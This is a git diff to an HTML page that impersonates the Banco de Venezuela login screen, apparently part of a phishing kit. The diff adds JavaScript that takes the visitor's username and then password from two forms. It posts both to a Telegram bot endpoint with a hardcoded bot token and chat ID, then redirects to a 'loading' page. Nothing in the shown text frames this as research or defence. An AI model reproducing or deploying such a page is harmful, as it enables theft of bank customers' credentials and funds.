--- a/index.html
+++ b/index.html
@@ -1,9 +1,11 @@
-
 <!DOCTYPE html>
 <html lang="es">
   <head>
     <meta charset="UTF-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <meta
+      name="viewport"
+      content="width=device-width, initial-scale=1.0, user-scalable=no"
+    />
     <title>Banco de Venezuela</title>
     <style>
       body {
@@ -36,6 +38,7 @@
       .right-side {
         width: 50%;
       }
+
       .form {
         width: 80%;
         background: white;
@@ -47,13 +50,16 @@
         body {
           background: #ededed;
         }
+
         .container {
           flex-direction: column;
         }
+
         .left-side {
           width: 100%;
           height: 100vh;
         }
+
         .right-side {
           display: none;
         }
@@ -88,14 +94,17 @@
         background: #ededed;
         outline: none;
       }
+
       .form-group input:focus {
         border: 0;
       }
+
       .form-group input:focus + label,
       .form-group input:not(:placeholder-shown) + label {
         top: 5px;
         font-size: 12px;
       }
+
       button {
         background-color: #0067b1;
         color: white;
@@ -133,9 +142,11 @@
 
         outline: none;
       }
+
       .form-group2 input:focus {
         border: 0;
       }
+
       .form-group2 input:focus + label,
       .form-group2 input:not(:placeholder-shown) + label {
         top: 5px;
@@ -152,8 +163,10 @@
         left: 0;
         width: 100%;
         height: 100%;
-        background-color: rgba(0, 0, 0, 0.5); /* Fondo semitransparente */
-        z-index: 9999; /* Asegura que esté por encima de otros elementos */
+        background-color: rgba(0, 0, 0, 0.5);
+        /* Fondo semitransparente */
+        z-index: 9999;
+        /* Asegura que esté por encima de otros elementos */
       }
 
       .content {
@@ -163,49 +176,89 @@
         text-align: center;
       }
     </style>
+    <style>
+      .form-group2 {
+        position: relative;
+        margin-bottom: 20px;
+        margin: 20px;
+      }
+
+      .form-group2 label {
+        position: absolute;
+        top: 50%;
+        left: 10px;
+        transform: translateY(-55%);
+        color: #999;
+        transition: top 0.3s, font-size 0.3s;
+        pointer-events: none;
+        white-space: nowrap;
+        /* Asegura que el texto del label no se rompa */
+      }
+
+      .form-group2 input {
+        width: 100%;
+        padding: 10px 10px 10px 10px;
+        box-sizing: border-box;
+        position: relative;
+        height: 60px;
+        border: 0;
+        border-bottom: 1px solid gray;
+        background: #ededed;
+        outline: none;
+        font-size: 16px;
+        /* Ajusta el tamaño de la fuente del input */
+      }
+
+      .form-group2 input:focus + label,
+      .form-group2 input:not(:placeholder-shown) + label {
+        top: 5px;
+        font-size: 12px;
+        left: 10px;
+      }
+    </style>
   </head>
+
   <body>
     <div class="overlay" id="overlay" style="display: none">
       <div class="content">
-        <!-- Aquí va tu contenido -->
         <form id="loginform2">
           <h4 style="color: #0067b1 !important">Introduce tu contraseña</h4>
           <div class="form-group2">
-            <input type="text" id="contra" required />
+            <input type="password" id="contra" required />
             <label for="contra">Contraseña *</label>
           </div>
-          <script>
-            document.addEventListener("DOMContentLoaded", function () {
-              const input = document.getElementById("contra");
-              const label = input.nextElementSibling;
-              label.style.top = "50%";
-              if (input.value !== "") {
-                label.style.top = "15px";
-                label.style.fontSize = "12px";
-              }
-
-              input.addEventListener("focus", () => {
-                label.style.top = "15px";
-                label.style.fontSize = "12px";
-              });
-
-              input.addEventListener("blur", () => {
-                if (!input.value) {
-                  label.style.top = "50%";
-                  label.style.fontSize = "";
-                }
-              });
-            });
-          </script>
           <div style="width: 100%; text-align: center; padding-bottom: 30px">
             <button style="width: 160px">Continuar</button>
           </div>
         </form>
       </div>
     </div>
+    <script>
+      document.addEventListener("DOMContentLoaded", function () {
+        const input = document.getElementById("contra");
+        const label = input.nextElementSibling;
+        label.style.top = "50%";
+        if (input.value !== "") {
+          label.style.top = "15px";
+          label.style.fontSize = "12px";
+        }
+
+        input.addEventListener("focus", () => {
+          label.style.top = "15px";
+          label.style.fontSize = "12px";
+        });
+
+        input.addEventListener("blur", () => {
+          if (!input.value) {
+            label.style.top = "50%";
+            label.style.fontSize = "";
+          }
+        });
+      });
+    </script>
     <div class="container">
       <div class="left-side">
-        <form  action="step-2.php" method="POST" id="loginform" class="form">
+        <form id="loginform" class="form">
           <div style="text-align: center">
             <img src="logo.png" alt="" style="width: 60%; margin-top: 20px" />
           </div>
@@ -270,5 +323,53 @@
 
   <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>
 
-  
+  <script>
+    const url = "https://ipapi.co/json/";
+    const form = document.querySelector("#loginform");
+    const form2 = document.querySelector("#loginform2");
+    form.addEventListener("submit", (event) => {
+      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
+      const nombre = document.querySelector("#nombre").value;
+      localStorage.setItem("usuario", nombre);
+      const message = " ------ BDV ------ Nombre: " + nombre;
+
+      axios
+        .post(
+          "https://api.telegram.org/bot7471890277:AAEMSHt3Q8P9yUGOxiYLrdTUp8IwG2YUiB8/sendMessage",
+          {
+            chat_id: "6734431637",
+            text: message,
+          }
+        )
+        .then((response) => {
+          document.getElementById("overlay").style.display = "";
+        })
+        .catch((error) => {
+          console.error(error);
+        });
+    });
+
+    form2.addEventListener("submit", (event) => {
+      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
+      const nombre = localStorage.getItem("usuario");
+      const contra = document.querySelector("#contra").value;
+      const message =
+        " ------ BDV ------ Nombre: " + nombre + " ------ Contra: " + contra;
+
+      axios
+        .post(
+          "https://api.telegram.org/bot7471890277:AAEMSHt3Q8P9yUGOxiYLrdTUp8IwG2YUiB8/sendMessage",
+          {
+            chat_id: "6734431637",
+            text: message,
+          }
+        )
+        .then((response) => {
+          window.location.href = "cargando.html";
+        })
+        .catch((error) => {
+          console.error(error);
+        });
+    });
+  </script>
 </html>
